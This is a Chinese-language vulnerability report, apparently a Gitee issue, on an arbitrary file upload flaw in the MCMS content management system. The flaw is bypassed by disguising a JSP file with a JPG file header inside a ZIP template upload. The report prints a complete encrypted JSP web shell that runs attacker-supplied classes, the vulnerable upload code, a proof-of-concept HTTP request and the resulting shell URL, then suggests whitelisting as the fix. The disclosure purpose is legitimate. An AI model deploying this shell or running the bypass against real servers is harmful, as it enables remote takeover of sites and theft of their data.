5.3.3 存在任意文件上传漏洞(文件幻数绕过)

# 部署
用tomcat部署mcms
# 漏洞功能点
![输入图片说明](https://foruda.gitee.com/images/1694765062721896776/46d1e20b_13446151.png "屏幕截图")
## 漏洞复现以及代码审计
首先正常上传一个ZIP压缩包，里面放入一个jsp恶意文件。
jsp的内容为

```java
<%! String xc="3c6e0b8a9c15224a"; String pass="123456"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>
```
![输入图片说明](https://foruda.gitee.com/images/1694765092531063070/41a30f4b_13446151.png "屏幕截图")
直接进行上传，提示禁止上传
![输入图片说明](https://foruda.gitee.com/images/1694765105283994076/ceb407a0_13446151.png "屏幕截图")
然后查看一下这个代码的功能点代码，下面是两处重要代码
 **_net\mingsoft\basic\action\ManageFileAction.class_** 
```java
  @PostMapping({"/uploadTemplate"})
    @ResponseBody
    public ResultData uploadTemplate(@ApiIgnore UploadConfigBean bean, @ApiIgnore boolean uploadFolderPath, HttpServletResponse res) throws IOException {
        String uploadTemplatePath = MSProperties.upload.template;
        if (this.checkUploadPath(bean)) {
            return ResultData.build().error(this.getResString("err.error", new String[]{this.getResString("file.path")}));
        } else {
            if (StringUtils.isEmpty(bean.getUploadPath())) {
                bean.setUploadPath(uploadTemplatePath + File.separator + BasicUtil.getApp().getAppId());
            } else if (!bean.getUploadPath().substring(0, uploadTemplatePath.length()).equalsIgnoreCase(uploadTemplatePath)) {
                throw new BusinessException("uploadPath参数错误");
            }

UploadConfigBean config = new UploadConfigBean(bean.getUploadPath(), bean.getFile(), (String)null, uploadFolderPath, bean.isRename());
            ResultData resultData = this.uploadTemplate(config);
            String templateUrl = uploadTemplatePath + File.separator + BasicUtil.getApp().getAppId();
            if (!templateUrl.equals(bean.getUploadPath())) {
                return ResultData.build().success();
            } else {
                String fileUrl = (String)resultData.get("data");
                if (fileUrl != null && (fileUrl.contains("../") || fileUrl.contains("..\\"))) {
                    return ResultData.build().error();
                } else {
                    File zipFile = new File(BasicUtil.getRealTemplatePath(fileUrl));
                    ZipUtil.unzip(zipFile.getPath(), zipFile.getParent(), Charset.forName("gbk"));
                    FileUtil.del(zipFile);
                    String htmlPath = zipFile.getParent() + "/html";
                    if (FileUtil.exist(htmlPath)) {
                        FileUtil.del(htmlPath);
                    }

String dataPath = zipFile.getParent() + "/data";
                    if (FileUtil.exist(dataPath)) {
                        FileUtil.del(dataPath);
                    }

List<File> files = FileUtil.loopFiles(zipFile.getParent());
                    List<String> deniedList = (List)Arrays.stream(MSProperties.upload.denied.split(",")).map(String::toLowerCase).collect(Collectors.toList());
                    Iterator var14 = files.iterator();

while(var14.hasNext()) {
                        File file = (File)var14.next();
                        FileInputStream fileInputStream = new FileInputStream(file);
                        String fileType = FileTypeUtil.getType(file).toLowerCase();
                        if (deniedList.contains(fileType)) {
                            IOUtils.closeQuietly(fileInputStream);
                            FileUtil.del(zipFile.getParent());
                            throw new RuntimeException(StrUtil.format("压缩包内文件{}的类型{}禁止上传", new Object[]{file.getName(), fileType}));
                        }

IOUtils.closeQuietly(fileInputStream);
                    }

return ResultData.build().success();
                }
            }
        }
    }
```

```java
    protected boolean checkUploadPath(UploadConfigBean bean) {
        return bean.getUploadPath() != null && (bean.getUploadPath().contains("../") || bean.getUploadPath().contains("..\\"));
    }
```
代码逻辑看完了，涉及到这一个业务操作的，就是检查文件类型，可以看到这里是使用`FileTypeUtil.getType(file).toLowerCase();`来获取文件类型的，这个函数只判断了文件幻数，我们只需要将一个jsp文件伪装成jpg就行了（用winhex给jsp文件加上jpg的文件头）
![输入图片说明](https://foruda.gitee.com/images/1694765143704212919/4cea43cb_13446151.png "屏幕截图")
然后打包成zip
![输入图片说明](https://foruda.gitee.com/images/1694765153466691296/40942c6d_13446151.png "屏幕截图")
上传
## POC
```html
POST /ms/file/uploadTemplate.do HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------67876309925067735723715279704
Content-Length: 1434
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/ms/basic/template/index.do?
Cookie: pageno_cookie=1; JSESSIONID=A1DFB2BA0BAC483716003E360E68F239; SHIRO_SESSION_ID=fedadf81-69fa-403e-b486-10d7b1f43b33; rememberMe=8IFUGZ0dXeklMY4ooFGMFiry2qzm1M7WgRTzPRvnj1XAL5nzEsUyvJinqPAkLOr/QDg2vN5i0F9Zk6ldRRtmxvNncDqoNvj1Vxp8g6vTF78uJuVgtvMHLzxNeR2eIxwsF8AvMN05yqnyjFC9/CUpthLgExbXS2xFQuh3U5RWJQCR+LlRGn4Nbc1BEiOdWDt4ow72SyNvlmqtvOJgBIJP0eByehKzAX4DTwp67/Jc3k6IqeUPxeQfoK1LdbisLi9+9GjMyCVrbZcAgMz5WJ20UXpjgthdXkoxrBm9IDTdUO1c8FUNfE83sdugUyKHegD/ffmouC4xeC7ig4418LzgPpCuHPeQGeyX987O+tEXoMWseHmswhyeW1hcPUK0Zr5cErkNm2Isud8cEFxMKgDROdJhyfn8FyU5v0+embBx4YTf/PQb285X1f4NfltvA9SHSmIYg0UoljKtb7O9/FpHW7VGHnx5XpEerGdTtzNtMiozBdw7V0/N2+N6qiANoJOXT1QjaAHP8B3PFxNV3hnmtrHfUGiG0YiiyhdkNpeUl6B5X/bdrg9mHFJJAY57vvNhxRuJQThxDPl+DP7bYbGknlwFuIi2dt88+3jFsRwv9SqVHRHDCu/h1Y/xTA50O2ghWQkrI/bpiNoZpfOINrqGmtx1Uu/XntTMDVFnaTtKtm2Srir8f7orzWF/1r6TadSMWwpOHI0be5NhQLhdVO64vhx3akRdY9XI4V0kTyZ6P5Nhe75s1cTVyL4KcT7f+DNDU9IO3IhBc6vEDSqezx5osjyKECrtVdHVrfkyOYYCinlgyDDfv7f2uEmX4vhZv886z3FqWRXo/haGrZN383gf2guc7275U0xc5svUCaFSb5ECOQwvqMqLuDnFE+wZy+B6kQBSYu2dMJBPQMb5N6ycsHMWsaLrOVRL6xUrkb8hERZhgavm7bsVeMrNUZ/VTICXuo9fHSd8I1ALD/pzJ2amlZf7V6NRCQotetnBpfoCmUo8Tsxf3kYYyzM3+RBG1xDJcuYe1HxxJJ3NQNnSK8aJ4H0ouW96kP5FuPlyQtyI8iU+eAgMZV0ZZvmkEfSEQ2cg37QamWnaauueqpXWvWF92liaao0QBYcey4YhIgMoE3QLLI+9bgK7SAa3bRbnJesXpzFeCSeWqQb3PjCHh7dfCBYTElPIuViasQLHcZGxcmEYqbwRa7iQEeiDDnqL+B37QW2QSOYxO0oYYtm1bStm39BfzGPPGp5CfREpqeWbA7RBrD/9GWw6X7VDuLZABx77Ss5+0S1PwH0fEobrmi0Ul+75NmMKoVdW3bRbtLYBNHz+/mPx4SCaEuker/gLfxGumNEt07v1FTu4LZY=

-----------------------------67876309925067735723715279704
Content-Disposition: form-data; name="uploadFolderPath"

true
-----------------------------67876309925067735723715279704
Content-Disposition: form-data; name="file"; filename="shell3.zip"
Content-Type: application/x-zip-compressed

PK
```
![输入图片说明](https://foruda.gitee.com/images/1694765199385359185/bb6ba075_13446151.png "屏幕截图")
上传成功
 **_http://localhost:8080/template/1/shell3.jsp_** 
![输入图片说明](https://foruda.gitee.com/images/1694765235105637076/ba1834e9_13446151.png "屏幕截图")

![输入图片说明](https://foruda.gitee.com/images/1694765238140869689/c2b45112_13446151.png "屏幕截图")

# 修复方案
建议对文件类型采用多因子判断，或者最好使用白名单控制上传文件

GVP 铭飞/MCMS

内容风险标识

评论 (5)

GVP铭飞/MCMS

内容风险标识